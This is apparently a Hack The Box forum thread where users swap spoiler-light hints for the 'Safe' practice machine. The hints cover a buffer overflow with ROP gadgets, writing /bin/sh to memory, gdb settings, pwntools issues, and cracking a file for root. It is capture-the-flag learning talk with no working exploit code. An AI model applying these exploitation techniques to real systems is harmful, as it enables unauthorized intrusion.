Safe

Type your comment> @adelmatrash said:

Someone can give me a hint (PM)? I can’t see how use the gadgets that I found to write my string into memory.

same…

If you don’t have gadgets take a different approach. > @sazouki said:

Type your comment> @adelmatrash said:

Someone can give me a hint (PM)? I can’t see how use the gadgets that I found to write my string into memory.

same…

If you don’t have gadgets to write take a different approach… Maybe there’s something else in the binary that allows you to do what you want easily.

There’s at least 1 gadget that you can use, r2 failed to find it though, so I used ROPgadget instead

Can’t believe this machine is rated ‘Easy’, I am still stuck on trying to exploit the binary.

Stuck at BOF, I cannot even make it work locally. Some hint or blog to read which could help me?

Any clue or help on how to download the binary? I’m on the highport and interacting with the exception but no idea how to download it…

EDIT: SOLVED

I’m stuck with exploiting the binary when aslr is on :frowning: Help me?

Hints for buffer overflow:

  • If you own the stack, you own the IP
  • Make sure you look at all the functions available to you, even if they aren’t called
  • “set disable-randomization off” in gdb helps see what you have and what you can’t count on

Since it’s an easy machine, at least should have made it obvious what function was easily exploitable on the binary. I did the binary exploitation with 2 different methods, but the intended way could be kind of easy to miss in the first place if you’re not familiar with the exploitation.
That being said if you feel lost, feel free to PM me on htb or discord sanre#5436. Don’t pm on forums since I’m not checking the inbox too often.

Really stuck on how to exploit the fact that the program is vulnerable to BOF. If someone is able to pm me on discord it would be helpful :smiley:

oneill#0460

How to write /bin/sh to the d**a section (or any writable section really)?
Edit: Solved and rooted!

Spoiler Removed

Great box IMHO. A great exercise for someone new to binary exploitation like myself. Some advice:

User:
I had trouble finding the correct commands to send what I needed to send to the binary. The “cat” command without a file name reads from stdin. So “(cat payload_file; cat) | ./vulnerable_binary” may be what you need to test your exploit payload.

Root:
The file that stands out - it can be “locked” with more than just a password.

Finally rooted! From my point of view not an easy machine for people inexperienced on binary exploitation but really good to learn! Some advice for user would be to think about what you’ve got, you can use those things on your favour. As for root, do not spend too much time on cracking hashes, it should be really quick! PM me if you need hints!

Has anyone tried to work with pwntools? The executable hangs after recvAll(). Any clues?

@0verfl00w said:
Has anyone tried to work with pwntools? The executable hangs after recvAll(). Any clues?

I couldn’t get it to work with pwntools either, so I just settled for an ugly workaround by settings short timeouts in recvuntil, which works fine.

will that binary will run only on x64 architecture?

i am not able run this binary!!!

a little help !

Type your comment> @0verfl00w said:

Has anyone tried to work with pwntools? The executable hangs after recvAll(). Any clues?

Had similar issues, the final string actually has the \n at the start…recvall() should be the same as if you’d nc’d to the remote port where it doesn’t show the prompt until you’ve given input; so recvall() is showing everything you’d normally see…I tried recvline() recv() and recvuntil() all the same.

@DHIYANESH @Fidget It is absolutely doable with pwntools, I had issues with it as well, most likely due to returns containing \n chars. I figured that I don’t really care about receiving any data, since it gets input from stdin I can just pass it along and it will be read when needed.

Yeah! finally i got user! WOW, i’m very happy because I never wrote an exploit by myself.
This is my first! :blush:

Edit: got root.